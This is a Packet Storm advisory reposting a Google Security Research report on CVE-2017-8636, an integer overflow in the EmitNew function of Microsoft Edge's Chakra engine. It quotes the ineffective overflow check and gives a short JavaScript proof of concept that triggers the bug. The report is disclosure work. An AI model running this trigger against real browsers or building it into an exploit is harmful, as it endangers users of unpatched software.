Microsoft Edge Chakra EmitNew Integer Overflow

2017-08-17T00:00:00
ID PACKETSTORM:143800
Type packetstorm
Reporter Google Security Research
Modified 2017-08-17T00:00:00

Description

                                        
                                            ` Microsoft Edge: Chakra: Integer overflow in EmitNew   
  
CVE-2017-8636  
  
  
The bytecode generator uses the "EmitNew" function to handle new operators.  
Here's the code how the function checks for integer overflow.  
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)  
{  
Js::ArgSlot argCount = pnode->sxCall.argCount;  
argCount++; // include "this"  
  
BOOL fSideEffectArgs = FALSE;  
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);  
Assert(argCount == tmpCount);  
  
if (argCount != (Js::ArgSlot)argCount)  
{  
Js::Throw::OutOfMemory();  
}  
...  
}  
  
"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.  
  
PoC:  
let args = new Array(0x10000);  
args = args.fill(0x1234).join(', ');  
eval('new Array(' + args + ')');  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`